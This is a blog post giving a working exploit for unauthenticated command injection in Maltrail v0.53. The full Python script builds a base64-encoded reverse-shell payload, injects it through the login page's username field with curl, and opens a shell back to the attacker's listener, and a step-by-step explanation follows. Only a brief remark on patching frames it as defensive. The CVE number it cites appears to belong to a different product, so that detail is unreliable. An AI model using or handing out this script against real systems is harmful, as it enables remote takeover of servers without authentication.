Exploiting Maltrail v0.53 — Unauthenticated Remote Code Execution (RCE)

Photo by Kaur Kristjan on Unsplash

In this blog post, we will delve into an exploit for Maltrail v0.53, which allows for unauthenticated remote code execution (RCE). This vulnerability has been assigned the identifier CVE-2023–27163.

Overview:

Exploit Title: Maltrail v0.53 — Unauthenticated Remote Code Execution (RCE)

Exploit Author: Iyaad Luqman K (init_6)

Application: Maltrail v0.53

Tested on: Ubuntu 22.04

CVE: CVE-2023–27163

Proof of Concept (PoC):

The exploit leverages a vulnerability in the Maltrail application to execute arbitrary code on the target system. The code provided below demonstrates the exploit in action:

import sys
import os
import base64

def main():
    listening_IP = None
    listening_PORT = None
    target_URL = None

    if len(sys.argv) != 4:
        print("Error. Needs listening IP, PORT and target URL.")
        return(-1)

    listening_IP = sys.argv[1]
    listening_PORT = sys.argv[2]
    target_URL = sys.argv[3] + "/login"
    print("Running exploit on " + str(target_URL))
    curl_cmd(listening_IP, listening_PORT, target_URL)

def curl_cmd(my_ip, my_port, target_url):
    payload = f'python3 -c \\'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\\''
    encoded_payload = base64.b64encode(payload.encode()).decode()  # encode the payload in Base64
    command = f"curl '{target_url}' --data 'username=;`echo+\\"{encoded_payload}\\"+|+base64+-d+|+sh`'"
    os.system(command)

if __name__ == "__main__":
    main()

How the Exploit Works:

1. The exploit script requires three arguments: the listening IP, listening PORT, and the target URL.
2. The script constructs a payload that, when executed, will create a reverse shell connection back to the attacker’s machine.
3. This payload is then encoded using Base64 to obfuscate its contents.
4. A curl command is constructed to send the payload to the target URL, specifically the login endpoint.
5. If successful, the payload is executed on the target system, granting the attacker a shell on the victim machine.

Diagram:

This exploit highlights the importance of regularly updating and patching software. Maltrail v0.53 has a critical vulnerability that allows attackers to execute arbitrary code on the target system without authentication. It’s essential to be aware of such vulnerabilities and take appropriate measures to mitigate them.